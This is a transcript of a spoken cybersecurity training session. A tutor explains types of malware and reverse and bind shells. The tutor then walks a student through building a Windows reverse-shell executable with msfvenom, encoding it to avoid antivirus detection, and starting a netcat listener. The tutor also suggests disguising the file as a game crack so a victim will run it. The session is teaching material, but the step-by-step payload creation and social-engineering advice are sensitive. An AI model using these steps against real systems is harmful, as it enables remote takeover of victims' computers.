Okay, so yesterday we talked about what is ransomware, right?
Yeah.
Ransomware is something that is going to encrypt all your data,
Yeah.
and it is going to ask for some ransom in return of releasing the decryptors or decryption keys.
Yeah.
Okay, some major ransomwares that you need to know about is one is Maze ransomware. Okay, another one is your WannaCry ransomware. That's pretty, I would say, well known in this industry. Okay.
Wait, could you write it down on there so when I'm getting notes so I can just read it a little bit more about it?
Yeah, sure. I'll add it here. Wanna cry?
Mhm.
Another one was Petya. Yeah. So then comes your spywares. So what is a spyware? Basically, spyware is a specific type of malware which is designed to spy on the target system. Okay, as the name itself signifies, that it is designed
Mhm.
to spy on the target machine or target user. Okay. What do you understand by what do you mean by spying? Simply by monitoring the user's activity, what all websites is he visiting, what all applications is being used by him, what all applications are installed, at what point of day, at what time, at where, at what time he is doing what thing. Okay,
Mhm.
as the literal meaning of spy is used here in the spywares. Okay, now we have got a further type in spyware. It's called keylogger. So what happens in keylogger is it's a specific type of malware which is used to monitor the keylogs or keystrokes, to monitor and capture the keystrokes of the target system. Okay, maybe you are already aware of keyloggers, right? Or have you ever used some kind of keylogger?
Yes, I used it like years ago. So I installed a software in my computer so anybody whatever they're typing I can read it. Yeah.
Right. So generally,
And
this approach is also followed that by simply installing a keylogger in your own system, so that if
mhm.
anybody else uses it, okay, you
Mhm.
got to know that what all keys were typed. Some many a times some keystrokes are some passwords are sensitive information is revealed this way. Okay.
Yeah.
Or similarly, this keylogger can also be installed on the target system as well. Okay. Whatever
Mhm.
suits the scenario, that can be done. So then comes your rootkits. So what is the case with the rootkits is rootkits are very hard or very difficult to detect. Why so? So actually what happens is rootkits hide themselves by modifying the low level system files that are there. Most of the time the probably the library files, or you would say your DLL files, for example. Many a times when you install a game, yeah, you can face an error that says specific DLL is missing. Okay, and
Mhm.
then you download that specific DLL from some third party, from from somewhere else. You download that DLL, put it in your system 32 folder, okay, and the game starts working. But what you would have done here is potentially you have allowed a rootkit to gain access to your system. Okay, because
Mhm.
low level system level files are, I mean to say that most of the times a user does not care about them. Most of the time a user is not familiar about their existence. They do not know, the user do not know about the usage of those files, why they exist. it's something that is, I would say, left aside by the user. And what what more can I say? Low level system level files, uh, yeah, operating systems API calls, and kernel level files, okay, kernel configuration files, system
Hmm.
firmware. Like in your Linux system, there's a directory called /proc. /proc generally constitutes of all the kernel configuration files. So, have you ever modified any /proc directory file?
No.
No problem. So, let's come back. So that was about your rootkit. Now another major concept that you need to know is about shells. What is a reverse shell and what is a bind shell? So two types of shell, reverse shell and bind shell. So,
Okay. What are the shell?
yeah, I'm telling you. So basically the command prompt in Windows or the terminal in Linux, both of them are referred as a shell. Okay, and if so, you would already be aware of port number 22 SSH, the
Yep.
secured shell, right? So basically, if you get access to somebody else's shell, that means you can remotely administer that system. Okay, you can remotely control that system, right?
Mhm.
Because everything can be done through the command line interface. So now you are clear with the shell. What is a shell?
So clarify a little bit.
Okay, so let's say when I do an SSH into another machine, okay,
Mhm.
and I have successfully SSH'd into it. So what will I get in return? In return, I'll get a remote shell of that system. The terminal that I'll be having, which is going to be used to control the target system, that is considered as shell. Not clear yet?
So SSH. Yeah.
Yeah, SSH.
So it have a certain port.
Yeah,
Mm, it's port number 22. Am I right?
yeah, it's port number 22.
And usually it's in a server, web server.
Yeah, it can be anywhere. I can probably
Mm.
start a I can probably start a SSH server on my system as well, and I can allow
Mhm.
you to access that port, access my machine remotely. That is
Mhm.
also possible. Yeah.
Okay.
So I was just giving you the example of SSH, that when I do an SSH, I am allowed to remotely administer that another system. I can remotely control another system. Okay. The
Yep.
thing that I'm getting back is a shell, basically. The the terminal that I am able to access, but remotely.
Yeah.
Okay. So if I take this example of my this Kali machine, this is the terminal. Okay. But I'm not accessing this terminal remotely. I'm physically available with this machine, so I'm accessing this terminal. But what if
Mhm.
this terminal, I can access it from somewhere else? That's the whole case.
Yeah. Without doing any remote access software like a TeamViewer
Yeah,
or some.
right.
Yeah.
So those are basically your graphical user interface based UI based softwares. Okay.
Mhm.
But if you want to be,
SSH.
yeah,
SSH is more kind of a terminal basis, like a coding
right,
basis.
right. Command line, CLI based.
Come on.
Yeah. So in the types of shells, we have got two types of shells. So
Mm-hmm.
one is your reverse shell, and another one is your bind shell.
Mm-hmm.
So what happens in reverse shell is, here you can see two systems. One is the attacker system. One is your victim system.
Mm-hmm.
Okay. Both of these systems have their corresponding IP addresses. So what attacker is going to do is, attacker is going to open a port on his own system. Okay. So here it says port number 444 is listening port. So attacker
Mm-hmm.
has opened a port on his own system and has basically started a listener on his own system. Now what he is going to do is, he is going to probably send up some kind of a payload to the victim machine. Okay, some piece of malware or software or payload that is going to be created and sent by the attacker to the victim machine. Once the
Okay.
victim executes that payload in his system, a reverse connection is going to be created back to the attacker IP address and on the attacker listening port. And through that connection, basically your terminal, your shell is going to be shared. Through this connection, the attacker would be able to control the victim machine through a remote shell.
Mm-hmm.
So the key here is that when victim is going to create a connection back to the attacker machine, that is going to be considered as a reverse shell. Okay.
Okay.
And when a payload is sent to the victim by the attacker, and what happens once that payload is executed is, victim does not connect back to the attacker. Instead, that payload opens a port on the victim IP on the victim machine. Once that payload is executed, the port is opened. Now the attacker establishes a forward connection to the victim machine.
So in a way to say, the first one reversal,
Yeah,
and in this one the attacker open the port,
on
send a
his own
payload
machine.
to the on machine, and send a payload to the victim.
Yeah,
Then once the payload is open or executed, the attacker will have access to it.
right. The attacker will
The
have access to the remote
access to
system.
the victim system.
Right, right.
The other side, the next one, is it the same? Like it's a part of the same shell, or it's a different shell?
It's a totally different shell. Okay,
Okay,
different scenario. What happens
so
is, yeah,
mhm. So
yeah, you,
attacker did not open a port, but victim opened the port.
yeah. So actually, attacker only opened the port, but it opened the port indirectly. Okay, because attacker cannot open the victim's port directly. So that's why he
Okay.
sent a payload, and when that payload is executed, a port is opened. So you can consider it as a some kind of a backdoor is opened. Okay.
Yeah.
So once that port is opened, now the attacker is going to establish a forward connection to the victim machine at
Yep.
that port that is open now.
Mhm. Perfect.
In both the cases, the arrow, you can see the arrow sign.
Hmm.
This is the bind shell, and
Yep.
this is the reverse shell.
Yep.
Okay, so there are certain tools that can be used to create trojans and malwares. Okay,
Hmm.
let me just give you the names of those tools. Let's say
Could you
there.
write it on our notes?
Yeah, I'll
Yeah.
write it on my notes as
Okay,
well.
perfect, perfect.
So these are just the example of a remote administration tool, also known as RATs. Okay, but I'll not be showing you the demonstration of Dark Comet or Droid Jacker, as they are very easily detected by any AV. Okay, so
They
instead,
are
what I'm
easy
going,
to detect it.
yeah, they are easily detected. If you are going to create a payload using them,
Hmm.
they are very easily detected. Okay.
Okay.
So
So
RAT,
which
those,
it was a dark one, yeah?
the Dark Comet.
Dark comet. Okay.
Yeah. So these tools are basically used to create RAT. RAT is basically known as your remote administration tool.
Remote administration tool. Okay.
Yeah. Probably it creates a malware that is sent to the target system.
Hmm.
Once the target system executes that malware, a reverse connection is established. Okay, and through this RAT, there's a very good graphical user interface provided to the attacker. Through that graphical
Hmm.
user interface, that attacker can probably monitor and configure and watch all the activities that is happening on the target system.
Hmm.
Well, in our Kali Linux, we have got a utility with the name of MSF Venom. MSF Venom. So let me type MSF Venom hyphen help so that a help menu can appear. So MSF Venom can be used to generate various kinds of payloads. Okay, it's a dedicated tool dedicated for payload generation. Okay, so MSF Venom hyphen L payload. So hyphen L is used to list the payloads. Okay, to list the payloads, and I'm using hyphen payload so as to I can see a list of payloads. Let's see what all payloads are available to us. There's going to be a huge list of payloads that we can choose from.
If I'm on the right, okay, okay. There are thousands of them.
Yeah,
Scope framework payload 556 total.
yeah, probably. Does it does shows me?
Hmm.
So in these payloads, probably you can see a format that is being followed here. So how are we going to decide our payload? Some things to keep in mind: the target operating system first of all. Okay, let's say it's a Windows operating system. Okay, so I need to select some Windows based payload only. Okay, Windows. Yeah, so I have highlighted one payload here, and through the payload syntax, you can understand what kind of payload I am going to use. So Windows, so this payload is basically targeted towards the Windows operating system. Shell, you are going to get a basic shell, and it's going to be reverse TCP. Okay, so basically it is going to connect a reverse TCP connection, reverse TCP shell on your attacker machine if you are going to use this payload. Okay,
Okay.
so let me copy this payload.
So which one was? It's a Windows, yeah.
Yeah,
So it depends which operating system they are using.
you
We are
right,
going to create that payload. Yeah.
right.
So if it's Windows, then it will create a Windows. If it's
If it's a Mac OS, OS X is going to be used. If it's Linux, Linux is going to be used. Okay, you
mhm,
can see here OS X, Linux, and further if you know the architecture, if it's
mhm.
32-bit, your x86 payloads are going to be used. Okay? And if you know the 64-bit architecture, then those are going to be used command based BSD, Android. Okay,
Yep. Yep.
Apple iOS. Okay, cool. Let's go back.
So what we can do, we can use nmap s hyphen ss to bring the all the machines in our system. Yeah.
Hyphen SN
sm n
N.
sorry sn.
Yeah, to perform a ping sweep.
So nmap hyphen sn. Yeah. Like
Yeah,
a lowercase sn.
yeah, right.
Okay, it's saying 00. It must be okay. I know what I have to do.
Okay, so I have selected a payload now. Now, how to use this payload? Yeah, Navneet, can you follow along?
Yep, I'm following along.
Yeah, MSF Venom hyphen P. Hyphen P is used to set a payload, and I'm pasting my payload that I have selected. Okay,
Okay, we paste it
pasted
down.
the payload. Yeah, this is the payload that I want to use to create my payload. Now, followed by the L host and the L port values. So L host is equals to L host is basically your local host. Okay, let me open another tab. Let me do ifconfig. Copy this IP address, paste this IP address, L port. Let me type 9999 here. Hmm. So what I'm doing here is I'm providing uh, details that when this payload is going to be executed, at which IP address and at which port does it want to connect back to the machine from the victim machine.
So
Okay.
lhost
So here I am going.
is the IP address. Yeah. The target
Yeah,
IP
L host
address.
is your no, the local host, the local IP address, IP address of your own machine, of your own Kali Linux machine, attacker's IP address.
Okay.
So here we are just providing the connect back IP address to our payload. And when that payload is going to be executed, as we know that in reverse shell, a reverse connection is going to be initiated from the victim machine to the target to the attacker machine, right?
Mhm.
So I'm providing that when you are going to create a reverse connection, where do you want to connect? Here, the details that I'm providing here, make a reverse connection here on these details.
Okay.
Okay. So MSFLM hyphen P Windows. Okay. Now comes your hyphen F flag. Hyphen F is for format. Okay. What kind of format do I want? The output format basically. So as I'm creating a Windows, so probably the executable file in Windows I already know is exe. Okay.
Which is the access file. Yeah.
No, the executable
The
files.
Yep.
Okay. So let me type hyphen F exe. So basically what I want is I want to use this payload, set these configuration settings, the L host and the L port. L
Hmm.
port is your local port or your listening port, and L host is your local host or your listening host.
Hmm.
Followed by hyphen F, that is for format. Format I have mentioned here, the output format is exe. Okay. Followed by hyphen O flag. Hyphen O is for saving the output. Followed by hyphen O needs to be followed by the output file name, whatever you want to save. So let me type rks.exe here. Okay. So I have provided the output file name as well here. Okay. Now this command is completed. I can probably press enter. Let's wait for the payload generation.
Sorry, excuse me.
Hello.
Okay, just give me a quick second, please. Okay.
Okay, so here you can see that final size 73,000 bytes of file size has been created, saved as rks.exe. Let me do an ls and let me see if I have rks.exe. So I have it here. Okay. So other than that, it says no encoder or bad cat specified, no architecture selected, okay, no platform. So let me remove this exe first, rm rks.exe, create this payload again. So let me show you two more flags that can be used. So one is your hyphen platform. So this flag is generally used to specify the target platform, just to explicitly specify it. Okay.
Okay, I'm going to pause for a quick second.
Okay.
So, so MSF
Yeah.
Venom
Yeah.
and space hyphen payload. It will bring all the payloads. Am I right?
Hyphen L space payloads. Hyphen L is used to list.
Okay. And then payload. Is there a hyphen after the before the payload?
No, no.
Okay. Okay. And then we select the Windows payload. Yeah.
Yeah.
So in this one, put it Windows shell reverse. So when we are creating the payload, we go MSF Venom
Yeah.
hyphen P, and then we put it the payload.
Yeah.
Oops. You know what? Just copy this one first and map. First of all, I needed our IP address. ifconfig. Come on. Sorry, my machine is really, really slow.
It's a virtual machine.
Yeah,
How much RAM have you allocated to that machine?
I had it 4 GB.
So 4 GB has been allocated to the Kali Linux itself.
Yeah.
Okay, then I don't think that it needs to lag because I'm running this Kali Linux machine with 1 GB of RAM, and you are running this Kali Linux with 4 GB.
Yep. So capital L host. Yeah.
Yeah, these things need to be case sensitive. This terminal
And space L and the port.
font size here.
So we can give it any port. Yeah. Or do I have? Do we have to specify the?
Any port can be given. Any port that on which you want to get a connection back.
It's my keyboard. It's not my system. It's actually my
Okay.
keyboard. That's
Uh,
why it's lagging. So there is no space between the equal sign. Yeah.
yeah, no space.
So we give it 999 a port number
Yeah.
space hyphen F space exe or dot exe.
No, no, this exe.
So they are case sensitive. So I have to put it capital L host and capital L port. Yeah, everything
Yeah,
needs to be capital.
yeah,
Okay, that's what I was doing wrong actually. I was
okay.
rks.exe.
That's my output file name. You can name it any way you want.
Okay, so we entered down. So I did some mistake missing requesting argument for option.
So share me your screen. Let me see what you are doing wrong. Let me see.
Sorry, I excuse you quickly. I pause you. Just wanted to check it. Can you see my screen now?
Yeah, I can see your screen now. Yeah, so okay, so this command is not completed yet. I was showing you another flag called hyphen hyphen platform. Okay,
Oh,
yeah, so that's why
that's why
without
I
the
was.
hyphen hyphen platform, yeah, now you can press enter and it is going to work.
So file name. Okay, now it will create the um, payloads. Yeah.
Right.
Did.
You can do an
So
ls and check if this file is created.
file name right here.
Okay,
Is
so
it
you have
correct?
right. So you have created this payload, but I was
Mm.
just showing you more specific, how to be more specific. Okay, because while you created this thing, it showed you certain
Mm.
errors there, certain warning
Uh, which one
let me,
were okay?
let me show you. It said no architecture selected, no platform selected, right there. Okay, so I am now using hyphen hyphen platform flag that is used to explicitly provide the platform that I am targeting. So as I know that Windows is the my target platform today, so I'm going to type
Yes,
Windows here. Okay,
which is showing right here the Windows. Yep.
then hyphen hyphen arc. Arc is your for architecture. Okay, what architecture I am targeting? Let me do x64 or I can do x86. Let me try x86. Press enter.
If so, it's a x86. Yeah.
Yeah, that is used when I'm targeting a 32-bit Windows. Let me do an ls and now we can see that this rks.exe has been created now.
So we got it hyphen platform Windows arc. Yep.
Let me further go ahead and specify some encoders. So encoders can be specified using -e flag. -e is to specify some encoder. So first of all, let me open a new tab. Let me see
So
a
we
list
are.
of encoders that are available. So
Mhm.
venom -l encoders. I'm listing all the available encoders. So encoders are just a way of encoding your payload, okay, just to prevent it from any detection and all that stuff.
Mhm.
Okay, so are a bunch. So I would probably be using something with good ranking or excellent ranking. So either this one or excellent PowerShell.
Hello. Your voice is cutting off actually. Hello.
Okay, so I was hello,
Sorry, your voice is cutting off in the
hello.
middle.
Can you hear me now?
Sorry, it's cutting off.
Okay, just give me a second. Let me check. Okay, got it. Okay, so can you hear me now?
Yep, I can hear you.
Okay, so I was saying that I am from here. I will be using some encoder with which is having some good ranking. Okay, some good, great, or excellent rank.
Hmm.
Okay, so let's choose one. Let's choose something with excellent. So this is the encoder. Simply copy it. Go back to your MSFM tab -e and paste your encoder, and then press enter. So now I'm creating another file. Now my output file name is encoded -rks.exe, as you can see,
Yep.
right? Now it has been in
So
create.
so we created two payloads. Yeah.
Yeah,
Okay.
okay. Now before, so we can send this payload to the target machine. Okay, now and we need to ensure that the target machine needs to double click on this payload. Once that is done, we are going to get a reverse connection back. Okay,
Hmm.
but when the reverse connection is going to come, where am I going to receive that connection? I am going to receive that connection on port number 999, as I have mentioned it in the payload. So for that I need to have this port on in the listening state as well. So currently this port is closed on my machine. So now
Hmm.
what I'm going to do is nc-nvlp port number.
To
So
open
this,
the port.
yeah, to open the port and put it into some listening state. Okay. So now if this payload is executed on the target Windows system, then I will get a connection back here on the netcat terminal. NC is for your netcat.
Hmm.
Okay. -nvlp are your flags. Hyphen N is for do not resolve for DNS. Hyphen V is for verbosity. Hyphen L is to put a port in the listening state. And hyphen
Mhm.
P is to specify, to mention the port, this port number.
Okay.
Okay, all the meaning of all these flags can be seen using the help menu, nc hyphen hyphen help, or you can look to the meanings using manual page, that is man space nc. Okay,
Okay.
yeah. So I hope now you know how to create a payload using MSF and how to receive an incoming connection using netcat.
Yep.
Now the delivery part, the delivery of the payload, the execution of the payload, that depends upon you only. Okay, that how do you want to deliver it to the victim, and how do you want to compel him, or I would say uh, make him execute that payload.
Mm-hmm.
Okay, you can. So generally what happens is some kind of lurking name is given to the payload. Okay, that this is the latest game or latest crack that is being provided to you,
Mm-hmm.
something like that. Okay,
So, where is say listen for the connection? So it's actually give me sorry, you're I'm getting echo.
your your voice is echoing.
Yep. So once we he's implementing this payload, we will be having a listen for the connection. So which means like we will be having a remote connection with him.
Yeah,
That's what he's mean. Yeah.
right.
Okay.
Okay,
Mm-hmm.
okay. So let me take a break for 5 minutes. Okay, probably
Mm-hmm.
5 minutes, and I'll resume
Sure.
from here. Okay, we'll
Sure.
start with
Sure.
another module. Okay,
Sure. So could you send me this one the notes so I can just go ahead and check it what I'm doing right here on my screen.
yeah, yeah, sure. I'll give you the.
Okay, perfect.